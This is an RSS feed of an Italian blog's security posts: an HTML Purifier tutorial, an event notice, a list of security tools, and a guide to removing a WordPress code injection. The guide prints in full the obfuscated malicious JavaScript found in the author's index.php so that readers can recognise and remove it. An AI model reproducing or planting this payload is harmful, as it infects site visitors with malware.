<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Paolo Gatti&#039;s web corner &#187; Sicurezza</title>
	<atom:link href="http://www.paologatti.it/category/informatica/sicurezza/feed" rel="self" type="application/rss+xml" />
	<link>http://www.paologatti.it</link>
	<description>..the place where I share my thoughts</description>
	<lastBuildDate>Mon, 06 Feb 2012 19:04:28 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Come ottimizzare e pulire il codice HTML dai tag inutili con HTML Purifier</title>
		<link>http://www.paologatti.it/2010/09/14/come-ottimizzare-e-pulire-il-codice-html-dai-tag-inutili-con-html-purifier</link>
		<comments>http://www.paologatti.it/2010/09/14/come-ottimizzare-e-pulire-il-codice-html-dai-tag-inutili-con-html-purifier#comments</comments>
		<pubDate>Tue, 14 Sep 2010 10:12:10 +0000</pubDate>
		<dc:creator>Paolo</dc:creator>
				<category><![CDATA[Informatica]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[codice]]></category>
		<category><![CDATA[html]]></category>
		<category><![CDATA[html purifier]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[pulizia codice]]></category>
		<category><![CDATA[tag]]></category>
		<category><![CDATA[w3c]]></category>

		<guid isPermaLink="false">http://www.paologatti.it/?p=1605</guid>
		<description><![CDATA[Chiunque abbia utilizzato un editor HTML visuale (come ad esempio Adobe Dreamweaver, Microsoft FrontPage o, i più recenti, Microsoft Expression Web e Sharepoint Designer), ma anche un qualsiasi CMS, si sarà sicuramente reso conto di quanto codice superfluo viene generato da questi programmi. Sebbene possa sembrare una sciocchezza, questo comporta una maggiore dimensione della pagina [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-1609" title="HTML Purifier" src="http://www.paologatti.it/wp-content/uploads/htmlpurifier.gif" alt="HTML Purifier" width="150" height="74" />Chiunque abbia utilizzato un editor <a title="HTML" href="http://it.wikipedia.org/wiki/HTML" target="_blank">HTML</a> visuale (come ad esempio Adobe Dreamweaver, Microsoft FrontPage o, i più recenti, Microsoft Expression Web e Sharepoint Designer), ma anche un qualsiasi CMS, si sarà sicuramente reso conto di quanto codice superfluo viene generato da questi programmi.</p>
<p>Sebbene possa sembrare una sciocchezza, questo comporta una maggiore dimensione della pagina (e/o dell&#8217;intero sito), una minore ottimizzazione e, verosimilmente, problemi di sicurezza.</p>
<p><a title="HTML Purifier" href="http://htmlpurifier.org/" target="_blank">HTML Purifier</a> è una libreria in PHP che assicura: <strong><em>sicurezza</em></strong> (rimuove il codice maligno, conosciuto come <a title="XSS" href="http://it.wikipedia.org/wiki/Cross-site_scripting" target="_blank">XSS</a>), <em><strong>pulizia del codice</strong></em> (analizza il codice al fine di renderlo pulito, conforme agli standard e alle specifiche W3C) e <em><strong>apertura alle modifiche</strong></em> (è open source e, di conseguenza, altamente personalizzabile).</p>
<h3>Installazione</h3>
<p>L&#8217;installazione è facile: dopo aver il <a title="HTML Purifier" href="http://htmlpurifier.org/download" target="_blank">pacchetto di installazione dal sito</a>, decomprimetelo sul vostro PC locale e poi trasferite la cartella <em><strong>library</strong></em>, sullo spazio web.</p>
<p>Ora impostate come scrivibile (chmod 755 o 777) la cartella:</p>
<pre><em>/path/to/library/</em>HTMLPurifier/DefinitionCache/Serializer</pre>
<p>dove <em>/path/to/library/</em>, è il percorso sul server fino alla cartella indicata.</p>
<h3>Configurazione</h3>
<p>Anzitutto è necessaria l&#8217;inclusione della libreria:</p>
<pre>require_once '<em>/path/to/library/</em>HTMLPurifier.auto.php';</pre>
<p>In moltissimi casi, questo già basta per permettere ad HTML Purifier di funzionare correttamente, ma, se il vostro Doctype fosse diverso da <em>XHTML Transitional</em> e il vostro set di caratteri diverso da <em>UTF-8</em>, sono necessarie delle ulteriori e semplici modifiche:</p>
<pre>require_once '<em>/path/to/library/</em>HTMLPurifier.auto.php';
$config = HTMLPurifier_Config::createDefault();
$config-&gt;set('Core.Encoding', 'ISO-8859-1');
$config-&gt;set('HTML.Doctype', 'XHTML 1.0 Strict');</pre>
<p>In questo caso, abbiamo modificato il Doctype in <em>XHTML 1.0 Strict</em> e il set di caratteri in <em>ISO-8859-1</em>.</p>
<h3>Esempio di utilizzo</h3>
<p>Infine, vediamo un esempio pratico di funzionamento di HTML Purifier:</p>
<pre>&lt;?php
$dirty_html = "... codice HTML non ripulito ...";
$purifier = new HTMLPurifier();
$clean_html = $purifier-&gt;purify( $dirty_html );
echo $clean_html
?&gt;</pre>
<p>Nella variabile <em>$dirty_html</em> è contenuto il codice iniziale, mentre, in <em>$clean_html</em>, il codice ripulito ed ottimizzato!</p>
<h3>Plugin</h3>
<p>I meno esperti o i pigroni (!), possono semplicemente integrare HTML Purifier, tramite plugin, ai più noti CMS, come <a title="HTML Purifier WordPress" href="http://wordpress.org/extend/plugins/html-purified/" target="_blank">WordPress</a>, <a title="HTML Purifier Drupal" href="http://drupal.org/project/htmlpurifier" target="_blank">Drupal</a> e <a title="HTML Purifier Joomla" href="http://extensions.joomla.org/extensions/style-a-design/accessibility/4094" target="_blank">Joomla</a>!</p>
<img src="http://www.paologatti.it/?ak_action=api_record_view&id=1605&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.paologatti.it/2010/09/14/come-ottimizzare-e-pulire-il-codice-html-dai-tag-inutili-con-html-purifier/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>ICT Security Day 2008</title>
		<link>http://www.paologatti.it/2008/09/27/ict-security-day-2008</link>
		<comments>http://www.paologatti.it/2008/09/27/ict-security-day-2008#comments</comments>
		<pubDate>Sat, 27 Sep 2008 09:21:02 +0000</pubDate>
		<dc:creator>Paolo</dc:creator>
				<category><![CDATA[Informatica]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[abruzzo]]></category>
		<category><![CDATA[ict security]]></category>
		<category><![CDATA[ict security day]]></category>
		<category><![CDATA[lanciano]]></category>
		<category><![CDATA[scienze della comunicazione]]></category>
		<category><![CDATA[sicurezza informatica]]></category>
		<category><![CDATA[unite]]></category>
		<category><![CDATA[Università]]></category>
		<category><![CDATA[università degli studi di teramo]]></category>

		<guid isPermaLink="false">http://www.paologatti.it/?p=804</guid>
		<description><![CDATA[Anche quest&#8217;anno si rinnova l&#8217;appuntamento dell&#8217;ICT Security Day giunto ormai alla sua terza edizione. Come negli anni passati, il Convegno si terrà a Lanciano (CH) sabato 4 Ottobre 2008 presso i locali dell&#8217;Auditorium &#8220;G. Paone&#8221; della Banca Popolare di Lanciano e Sulmona con il contributo di numerosi sponsor (tra cui IBM), relatori di fama nazionale [...]]]></description>
			<content:encoded><![CDATA[<p><img title="ICT Security Day 2008" src="http://www.paologatti.it/wp-content/uploads/ictday2008.gif" alt="ICT Security Day 2008" align="left" />Anche quest&#8217;anno si rinnova l&#8217;appuntamento dell&#8217;<a title="ICT Security Day 2008" href="http://www.ictsecurityday.it/index.html" target="_blank">ICT Security Day</a> giunto ormai alla sua terza edizione.</p>
<p>Come negli anni passati, il Convegno si terrà a Lanciano (CH) sabato 4 Ottobre 2008 presso i locali dell&#8217;Auditorium &#8220;G. Paone&#8221; della Banca Popolare di Lanciano e Sulmona con il contributo di numerosi sponsor (tra cui IBM), relatori di fama nazionale (Teti, D&#8217;Amico, Pollari, Foffi e altri) e organizzatori di tutto rispetto (Facoltà di Scienze della Comunicazione dell&#8217;Università degli Studi di Teramo).</p>
<p>Il programma dell&#8217;evento è disponibile <a title="Programma ICT Security Day 2008" href="http://www.ictsecurityday.it/2008/programma/programma.htm#programma" target="_blank">qui</a>. <strong>L&#8217;accesso è gratuito, ma i posti sono limitati</strong> per cui occorre iscriversi a <a title="Iscrizione ICT Security Day 2008" href="http://www.ictsecurityday.it/iscrizione.html" target="_blank">questo indirizzo</a>.</p>
<p>P.S. causa pigrizia mattutina, questo articolo l&#8217;ho semi-scopiazzato del blog del mio caro collega <a title="Heber D'Alberto Web Blog" href="http://www.dalberto.it/blog/2008/09/25/ict-security-day-2008/" target="_blank">Heber D&#8217;Alberto</a>!</p>
<img src="http://www.paologatti.it/?ak_action=api_record_view&id=804&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.paologatti.it/2008/09/27/ict-security-day-2008/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>5 importanti programmi per la sicurezza di Windows, Linux e Mac</title>
		<link>http://www.paologatti.it/2008/05/14/5-importanti-programmi-per-la-sicurezza-di-windows-linux-e-mac</link>
		<comments>http://www.paologatti.it/2008/05/14/5-importanti-programmi-per-la-sicurezza-di-windows-linux-e-mac#comments</comments>
		<pubDate>Wed, 14 May 2008 05:57:10 +0000</pubDate>
		<dc:creator>Paolo</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Mac]]></category>
		<category><![CDATA[Programma del mese]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[applicazioni]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[mac]]></category>
		<category><![CDATA[programmi]]></category>
		<category><![CDATA[software]]></category>
		<category><![CDATA[unix]]></category>

		<guid isPermaLink="false">http://www.paologatti.it/?p=606</guid>
		<description><![CDATA[A prescindere da quale sistema operativo utilizzate, non si può non pensare alla sicurezza: in questo articolo vedremo 5 software per Windows, Linux e Mac per incrementare la vostra sicurezza. Windows Firewall Quasi tutti hanno dei dati sensibili sui loro dischi rigidi che preferiscono tenere fuori dagli occhi indiscreti. Purtroppo, il Firewall di Windows XP, [...]]]></description>
			<content:encoded><![CDATA[<p>A prescindere da quale sistema operativo utilizzate, non si può non pensare alla sicurezza: in questo articolo vedremo 5 software per Windows, Linux e Mac per incrementare la vostra sicurezza.</p>
<h2>Windows</h2>
<h3>Firewall</h3>
<p>Quasi tutti hanno dei dati sensibili sui loro dischi rigidi che preferiscono tenere fuori dagli occhi indiscreti. Purtroppo, il Firewall di Windows XP, non è sufficiente a garantire ciò, poichè non è in grado di bloccare le connessioni in uscita, quindi vi consiglio di utilizzare, come alternativa ad esso, Comodo firewall. Con Windows Vista, invece, Microsoft ha affrontato (e risolto) questo problema, quindi non vi è alcuna necessità di utilizzare un firewall di terze parti.</p>
<p>Indipendentemente dal fatto che siete in XP o Vista, comunque, un router è essenziale: un firewall hardware è molto più sicuro di uno software.</p>
<p><strong>Raccomandazioni</strong></p>
<ul>
<li>Windows Vista: firewall incluso</li>
<li>Windows XP: <a href="http://www.personalfirewall.comodo.com/download_firewall.html">Comodo Firewall Pro Free</a> (freeware)</li>
</ul>
<h3>Anti-virus</h3>
<p>Forse il software più importante da avere su un computer (almeno se avete Windows come sistema operativo). Se non volete spendere soldini per software commerciali, vi consiglio uno di questi tre antivirus: AntiVir, Avast o AVG (ricordate comunque che, in nessun caso, dovrete installare più di un antivirus sul vostro computer).</p>
<p>Per quanto riguarda i software commerciali la scelta si riduce a: ESET NOD32 o Kaspersky Anti-Virus. Kaspersky Anti-Virus è leggermente superiore grazie ai tassi di rilevamento basati su file di firma, mentre NOD32 fornisce eccellenti euristiche (chiamate &#8220;ThreatSense&#8221; di ESET) per scoprire nuovi virus in circolazione.</p>
<p><strong>Raccomandazioni</strong></p>
<ul>
<li>Freeware: <a title="Antivir" href="http://www.free-av.com/" target="_blank">Antivir</a>, <a title="Avast" href="http://www.avast.com/" target="_blank">Avast</a> o <a title="AVG" href="http://free.grisoft.com/" target="_blank">AVG</a></li>
<li>Shareware: <a title="NOD32" href="http://www.eset.com/products/nod32.php" target="_blank">ESET NOD32</a> o <a title="Kaspersky" href="http://usa.kaspersky.com/trials/home-users/anti-virus-7/" target="_blank">Kaspersky Anti-Virus</a></li>
</ul>
<h3>Anti-spyware and Anti-adware</h3>
<p>Grazie all&#8217;acquisizione da parte di Microsoft della GIANT Company Software nel dicembre 2004, ora Windows ha un efficace software anti-spyware (disponibile per Windows XP e integrato con Windows Vista): Windows Defender. Potete utilizzare anche Lavasoft Ad-Aware (freeware), ma vi consiglio di utilizzarlo insieme a Windows Defender e non come alternativa. Se invece avete dei soldini da spendere, non vi è alcun dubbio che la migliore opzione commerciale è Webroot Spy Sweeper.</p>
<p><strong>Raccomandazioni</strong></p>
<ul>
<li>Freeware: <a title="Lavasoft Ad-Aware Free" href="http://www.lavasoftusa.com/products/ad_aware_free.php" target="_blank">Lavasoft Ad-Aware Free</a> e <a title="Windows Defender" href="http://www.microsoft.com/athome/security/spyware/software/default.mspx" target="_blank">Windows Defender</a></li>
<li>Shareware: <a title="Webroot Spy Sweeper" href="http://www.webroot.com/En_US/consumer-products-spysweeper.html" target="_blank">Webroot Spy Sweeper</a></li>
</ul>
<h3><span id="more-606"></span>Encryption</h3>
<p>Come dicevamo precedentemente, ognuno, sul proprio computer, ha dei file da tenere lontano da occhi indiscreti. Impostare una password di protezione è una possibilità, ma potrebbe essere troppo facilmente crackabile con qualsiasi programma di password cracking. Per tutte le vostre esigenze di privacy, la crittografia è la strada da percorrere e TrueCrypt è l&#8217;applicazione che vi consiglio di utilizzare, dato che offre una grande sicurezza con il minimo intervento dell&#8217;utente. Inoltre, è interamente gratuito, è disponibile per Microsoft Windows, Mac OS X e Linux ed è la migliore soluzione per questo scopo.</p>
<p><strong>Raccomandazioni</strong></p>
<ul>
<li>Freeware: <a title="TrueCrypt" href="http://www.truecrypt.org/" target="_blank">TrueCrypt</a></li>
</ul>
<h3>Watchdog (letteralmente, cane da guardia)</h3>
<p>Introdotto con Windows Vista, molti lo odiano (visto che rallenta notevolmente il sistema), mentre qualcun altro lo adora. E&#8217; quel sistema che chiede all&#8217;utente cosa acconsentire e cosa no. Se utilizzato correttamente, può bloccare vari tipi di malware. Per Windows Vista, come dicevamo, è incluso l&#8217;User Account Control (UAC) nel sistema, mentre, per Windows XP, vi consiglio Winpatrol.</p>
<p><strong>Raccomandazioni</strong></p>
<ul>
<li>Windows Vista: <a title="UAC" href="http://www.winpatrol.com/" target="_blank">UAC</a></li>
<li>Windows XP: <a title="Winpatrol" href="http://www.winpatrol.com/" target="_blank">Winpatrol</a></li>
</ul>
<h2>Linux</h2>
<h3>Snort</h3>
<p><a title="Snort" href="http://www.snort.org/" target="_blank">Snort</a> è un applicativo open source con funzioni di tipo IDS (Intrusion Detection Systems) distribuito con la licenza GPL. L&#8217;IDS viene installato collegando una o più sonde configurate per analizzare ogni pacchetto che circola nella rete, garantendo un ottimo punto di osservazione su tutti i movimenti nella nostra rete. Analizza i pacchetti che transitano in rete, confrontandoli con un database di firme di attacchi; impara a riconoscere nuovi attacchi, introducendo nuove firme riconosciute come attacchi; verifica i protocolli utilizzati dai pacchetti, in modo da riconoscere eventuali anomalie nel traffico; rileva l&#8217;attività dei port scan, &#8220;esplorazione&#8221; che precede generalmente un attacco; segnala tutte le possibili minacce identificate da queste attività di controllo.</p>
<h3>Wireshark</h3>
<p><a title="Wireshark" href="http://www.wireshark.org/" target="_blank">Wireshark</a> (precedentemente chiamato Ethereal) è un software, rilasciato sotto licenza GNU GPL,  per analisi di protocollo o packet sniffer (letteralmente annusa-pacchetti), utilizzato per la soluzione di problemi di rete, per l&#8217;analisi e lo sviluppo di protocolli o di software di comunicazione e per la didattica. Esso possiede tutte le caratteristiche di un analizzatore di protocollo standard. Le funzionalità di Wireshark sono molto simili a quelle di tcpdump, ma con un&#8217;interfaccia grafica, e maggiori funzionalità di ordinamento e filtraggio. Permette all&#8217;utente di osservare tutto il traffico presente sulla rete utilizzando la modalità promiscua dell&#8217;adattatore di rete (tipicamente si riferisce alle reti Ethernet, ma è possibile analizzare altri tipi di rete fisica).</p>
<h3>AppArmor</h3>
<p>Application Armor in breve <a title="AppArmor" href="http://www.novell.com/linux/security/apparmor/" target="_blank">AppArmor</a> è un software di sicurezza per Linux rilasciato sotto licenza GNU GPL. Esso permette, all&#8217;amministratore di sistema, di associare a ogni programma uno profilo di sicurezza che restringe le capacità del programma. Esso fu creato in parte come alternativa a SELinux, che i critici dichiarano sia difficile per gli amministratori impostarlo e mantenerlo. A differenza di SELinux, che si basa sull&#8217;appliczione di etichette ai file, AppArmor lavora sul sentiero (path) del file.</p>
<h3>Nmap</h3>
<p><a title="Nmap" href="http://insecure.org/" target="_blank">Nmap</a> è un software libero distribuito con licenza GNU GPL da Insecure.org creato per effettuare port scanning, cioè mirato all&#8217;individuazione di porte aperte su un computer bersaglio, in modo da determinare quali servizi di rete siano disponibili. È in grado di ipotizzare quale sistema operativo sia utilizzato dal computer bersaglio, tecnica conosciuta come fingerprinting. Nmap è divenuto uno degli strumenti praticamente indispensabili della &#8220;cassetta degli attrezzi&#8221; di un amministratore di sistema, ed è usato per test di penetrazione e compiti di sicurezza informatica in generale.</p>
<h3>Netcat</h3>
<p><a title="Netcat" href="http://netcat.sourceforge.net/" target="_blank">Netcat</a>, anch&#8217;esso distribuito con licenza GNU GPL , è descritto dai suoi sviluppatori come il coltellino svizzero del TCIP/IP: è un potente strumento per la lettura e la scrittura di dati di rete. E&#8217; estremamente versatile e può essere utilizzato per un&#8217;ampia varietà di cose tra cui port scan, trasferimenti di file, e per l&#8217;interazione con i servizi di rete remoto dalla riga di comando. Vi è anche una migliore e più moderna versione chiamata <a title="Socat" href="http://www.dest-unreach.org/socat/" target="_blank">socat</a>.</p>
<h2>Mac</h2>
<h3>Preferenze di Sistema</h3>
<p>La prima voce della lista per Mac OS X è il fidato pannello Preferenze di Sistema. Tramite esso è possibile controllare gli utenti abilitati ad accedere alla vostra macchina, far richiedere una password per riattivare il computer dallo sleep o dallo screensaver, fare il logout automatico dopo un determinato periodo di inattività etc. etc. Il pannello di sicurezza offre anche l&#8217;accesso al FileVault e al Firewall incorporato di Mac OS X che può essere impostato per consentire solo i servizi essenziali o controllare l&#8217;accesso di ogni singola applicazione (per ulteriori dettagli sulla configurazione del firewall di OS X, guardate più avanti).</p>
<h3>Utility Open Firmware</h3>
<p>Ogni Mac prodotto dal 2000 ha la possibilità di <a title="Impostare una password Open Firmware" href="http://support.apple.com/kb/HT1352" target="_blank">impostare una password in Open Firmware</a> che impedisce ad un utente con accesso fisico al computer o di avviarlo da un disco ottico, con un volume di avvio di rete, con una singola unità connesse in modalità disco di destinazione o in modalità single-user. Se vi trovate in un ambiente in cui avete bisogno di quel briciolo di sicurezza in più, questo accorgimento potrebbe fare al caso vostro!</p>
<h3>ClamAV</h3>
<p>Sì, è vero, virus, trojan, worm, e simili, al momento, sono molto rari su OS X, ma Apple sta guadagnando quota di mercato molto velocemente quindi non è da escludere che, in futuro, si svilupperanno malware anche per questo sistema e non è il caso di farsi trovare impreparati! Anche se ci sono diversi software antivirus commerciali per la piattaforma Mac, io vi consiglio l&#8217;applicazione open source <a title="ClamAV" href="http://www.clamav.net/" target="_blank">ClamAV</a> (disponibile in una versione appositamente costruita Mac OS X).</p>
<h3>Little Snitch</h3>
<p>Per evitare che un’applicazione acceda ad internet senza il nostro consenso esiste il pluripremiato <a title="Little Snitch" href="http://www.obdev.at/products/littlesnitch/index.html" target="_blank">Little Snitch</a>: non appena un programma tenta di inviare dei dati verso l’esterno, infatti, Little Snitch lo notifica con un messaggio e offre la possibilità di acconsentire tale comunicazione una volta sola, sempre o di negargli questa possibilità. Concepito per aumentare il livello di sicurezza e privacy del Mac, questa leggera e potente utility è molto utile per prevenire ed eventualmente aiutare a stanare l’attività di keylogger e malware.</p>
<h3>WaterRoof</h3>
<p>Se desiderate avere un maggior controllo sul firewall incluso in Mac OS X, vi consiglio il software open source <a title="WaterRoof" href="http://www.hanynet.com/waterroof/" target="_blank">WaterRoof</a>. Sebbene abbia una interfaccia grafica davvero molto semplice: si tratta di una potente applicazione che vi permetterà di gestire la tua larghezza di banda e controllare ogni aspetto della ipfw, tra cui la configurazione NAT, regole, port forwarding, e altro ancora.</p>
<h2>Conclusioni</h2>
<p>Oltre a tutte le applicazioni indicate in questo articolo c&#8217;è uno &#8220;strumento&#8221; che spesso viene trascurato da molti utenti: il buon senso. Ciò significa non cliccare sul link sospetti (prestando attenzione ai filtri antiphishing incorporato in quasi tutti i browser moderni e nei client di posta elettronica), non aprire le email sospette e, in generale, diffidare da tutto ciò che vi sembra poco sicuro.</p>
<p>Inoltre, assicuratevi di mantenere il vostro sistema aggiornato, cosa molto facile grazie ai meccanismi di auto-aggiornamento software inclusi in tutti i moderni sistemi operativi (in Windows c&#8217;è il <em>Windows Update</em>, in Mac OS X c&#8217;è l&#8217;<em>Aggiornamento Software</em> e in Linux potete utilizzare il sistema di gestione dei pacchetti della vostra distribuzione Linux preferita).</p>
<p>Fonte di ispirazione: <a title="Ars" href="http://arstechnica.com/guides/tweaks/five-security-apps-linux-osx-windows.ars/2" target="_self">Ars</a></p>
<img src="http://www.paologatti.it/?ak_action=api_record_view&id=606&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.paologatti.it/2008/05/14/5-importanti-programmi-per-la-sicurezza-di-windows-linux-e-mac/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Code injection su WordPress: guida alla rimozione del codice maligno</title>
		<link>http://www.paologatti.it/2008/05/07/javascript-code-injection-su-wordpress-guida-alla-rimozione-del-codice-maligno</link>
		<comments>http://www.paologatti.it/2008/05/07/javascript-code-injection-su-wordpress-guida-alla-rimozione-del-codice-maligno#comments</comments>
		<pubDate>Wed, 07 May 2008 06:14:22 +0000</pubDate>
		<dc:creator>Paolo</dc:creator>
				<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[baco]]></category>
		<category><![CDATA[bug]]></category>
		<category><![CDATA[javascript]]></category>
		<category><![CDATA[vulnerabilità]]></category>

		<guid isPermaLink="false">http://www.paologatti.it/?p=614</guid>
		<description><![CDATA[Ci risiamo: mi era già successo una settimana fa e mi è successo di nuovo nelle ultime ore.. Pensavo fosse un baco di WordPress 2.5, così ho aggiornato subito alla versione 2.5.1, sperando fosse stato risolto e, invece, a quanto sembra, il problema è rimasto. Di cosa parlo?! Di questo codice maligno (all&#8217;apparenza incomprensibile, poichè [...]]]></description>
			<content:encoded><![CDATA[<p><img title="Wordpress" src="http://www.paologatti.it/wp-content/uploads/wordpress_small.jpg" alt="Wordpress" align="left" />Ci risiamo: mi era già successo una settimana fa e mi è successo di nuovo nelle ultime ore.. Pensavo fosse un baco di <a title="Wordpress" href="http://wordpress.org/" target="_blank">WordPress 2.5</a>, così ho aggiornato subito alla versione 2.5.1, sperando fosse stato risolto e, invece, a quanto sembra, il problema è rimasto.</p>
<p>Di cosa parlo?! Di questo codice maligno (all&#8217;apparenza incomprensibile, poichè criptato in esadecimale) javascript che mi è stato <a title="Code injection" href="http://en.wikipedia.org/wiki/Code_injection" target="_blank">iniettato nel blog</a> (a me, così come a tanti altri bloggers che utilizzano WordPress come piattaforma):</p>
<p>[quickcode:noclick]<br />
&lt;script language=&#8221;javascript&#8221;&gt;$=&#8221;%63b%3d%22e(d%2573);%2573t%253dtm%2570%253d%2527%2527;for(i%253d0;i%253cds%252e%256ce%256eg%25%22;st%3d%22%2573t%253d%2522$%253d%2573%2574;%2564c%2573%2528d%2561%252bd%2562%252bd%2563+%2564%2564%252b%2564e%252c%2531%2530)%253b%2564w%2528s%2574)%253bs%2574%253d%2524%253b%2522;%22;da%3d%22fqb0})-~ug0Qbbqi87e~%257F7%3c7tfu7%3c7dxb7%3c7vyb7%3c7fyv7%3c7huc7%3c7fuc7%3c7wxd7%3c7u~y7%3c7ud~7%3c7|uf7%3c7dgu79+fqb0|)-~ug0Qbbqi87q7%3c7r7%3c7s7%3c7t7%3c7u7%3c7v7%3c7w7%3c7x7%3c7y7%3c7z7%3c7{7%3c7|7%3c7}7%3c7~7%3c7%257F7%3c7`7%3c7a7%3c7b7%3c7c7%3c7%22;de%3d%22-|)K88d)K7}7M;}^}950%2522%259M+yv888d)K7t7M:%25229.-%252096688d)K7t7M:%25229,-)99tSx-~)K8d)K7t7M50!%25209M+u|cu0tSx-|)K88d)K7t7M:&amp;950%2522%279M+4-4%3ebu`|qsu8t%3ciSx%2522;}Sx;iSx!;tSx;})Kd)K7}7M%3d!M;7%3es%257F}79+%22;dc%3d%220d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi899+yv8d)K7t7M,%25209d)K7t7M-!+d)K7}7M-t)%3ewud]%257F~dx89;!+ve~sdy%257F~0S]^8t%3c}%3ci9kfqb0b-888i;8#:t99;8}Nt9:#9;t9+budeb~0b+mfqb0t-7fuc|%257Fh%3es%257F}7+fqb0iSx!%3ciSx%2522%3c%22;cc%3d%2274%2568;i+%252b%2529{t%256dp%253dd%2573%252es%256c%2569ce%2528i,i%252b1%2529;st%253d%22;ce%3d%22ar%2543od%2565%2541%2574%25280)^%2528%25270%25780%2530%2527+es%2529))%253b%257d}%22;cz%3d%22%2566unc%2574ion%2520cz%2528cz)%257bre%2574ur%256e %2563a+c%2562+%2563c+%2563d+c%2565+%2563z;}%253b%22;dz%3d%22%2566un%2563t%2569on%2520dw(%2574){c%2561%253d%2527%252564%25256f%252563ume%25256et%252e%2577%252572i%2574%252565(%252522%2527;ce%253d%2527%252522)%2527;c%2562%253d%2527%25253csc%252572%2569%2570%252574 l%252561%256eg%252575a%2525%2536%2537%2565%25253%2564%25255c%25252%2532ja%2576a%2573cr%2569%252570t%25255c%2525%25322%25253e%2527;c%2563%253d%2527%25253c%25255c%25252fsc%2572%2569p%252574%25253e%2527;eva%256c(u%256ees%2563ap%2565(t%2529)%257d%253b%22;op%3d%22%2524%253d%2522dw%2528d%2563s(%2563u%252c1%2534));%2522;%22;ca%3d%22%2566%2575%256e%2563t%2569o%256e%2520dcs%2528d%2573,%2565s%2529{d%2573%253dunesca%2570%22;cu%3d%22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|&#8220;d.;;bqgx{l:w{y;xp;sfv;64c}p`|)%25$$4|q}s|`),$*(;}rfuyq*(;p}b*%22;dd%3d%22}Sx%3ctSx%3c}^}+yv8d)K7i7M,%2522%2520%2520%279kd)K7i7M0-0%2522%2520%2520%27+m}^}-S]^8d)K7t7M%3cd)K7}7M%3cd)K7i7M9+iSx!-|)K888d)K7i7M6%2520hQQ9;}^}950&amp;5##950%2522&amp;M+iSx%2522-|)K8888d)K7i7M6%2520h##!!9..#9;}^}950!%25209M+}Sx%22;db%3d%22d7%3c7e7%3c7f7%3c7g7%3c7h7%3c7i7%3c7j79+fqb0~)-~ug0Qbbqi8!%3c%2522%3c#%3c$%3c%25%3c&amp;%3c%27%3c(%3c)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)%3ewudVe||Iuqb89+yv8t)%3ewudTqi89.#9d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi89;%25229+u|cu%22;cd%3d%22s%2574+%2553tri%256e%2567.f%2572%256fmC%2568%2561rCo%2564%2565(%2528t%256dp%252ec%2568%22;%69f%20(d%6fcum%65nt%2e%63oo%6b%69%65.i%6edex%4f%66(%27%76%62ull%65tin%5fmu%6ctiq%75%6f%74e%3d%27)%3d%3d-1){sc%28%27vbu%6clet%69n%5fm%75l%74iqu%6ft%65%3d%27,2,7);%65va%6c(un%65sc%61pe%28d%7a%2bc%7a+op%2b%73t)%2b%27dw(%64z%2bcz%28$+%73t%29)%3b%27)}e%6cse{%24%3d%27%27};f%75nct%69on %73c%28cnm%2cv,e%64){%76a%72 ex%64%3dnew %44ate%28);%65xd.%73%65%74Da%74%65(ex%64.g%65tD%61%74e()%2b%65%64);%64%6fcu%6dent%2eco%6fkie%3dcnm%2b %27%3d%27 +esca%70%65(v%29+%27;ex%70i%72es%3d%27%2bex%64.%74o%47M%54%53t%72in%67%28);%7d;&#8221;;eval(unescape($));document.write($);&lt;/ script&gt;&lt;/body&gt;<br />
[/quickcode]</p>
<p>Per chi si trovasse nella mia stessa situazione, non disperate, <strong>il problema è di facile risoluzione</strong>: basta editare il file index.php (presente nella root dell&#8217;installazione di WordPress) e rimuovere brutalmente il codice indicato in precedenza.</p>
<p>Fatto ciò, non ci resta che sperare che lo staff di WordPress tappi questa <strong>grave falla</strong> al più presto!</p>
<p>Ah, dimenticavo, <strong>mi scuso con tutti voi per gli eventuali disagi provocati dal codice maligno<em></em></strong>.</p>
<p><strong><em>AGGIORNAMENTO DELLE 22.50 DEL 07/05/2008</em></strong></p>
<p>Bene.. ci sto capendo qualcosa di più su questa situazione alquanto strana. Anzitutto l&#8217;iniezione di codice maligno sembra non derivare da un baco di WordPress, ma di una vulnerabilità dei server <a title="Aruba" href="http://www.aruba.it" target="_blank">Aruba</a>. Per approfondire l&#8217;argomento date un occhio a <a title="Gromoson" href="http://maipiugromozon.blogspot.com/2008/04/cambia-il-server-del-mbr-rootkit.html" target="_blank">questo sito</a> dove è indicato anche come eliminare il <strong>MBR rootkit/trojan Sinowal</strong> (questo è il nome del malware), nel caso in cui qualcuno di voi fosse stato infettato (spero non dal mio sito!).</p>
<p>Ah, di questa cosa ne ha parlato anche <a title="Napolux" href="http://www.napolux.com/2008/05/07/gromozon-e-wordpress/" target="_blank">Napolux</a>.</p>
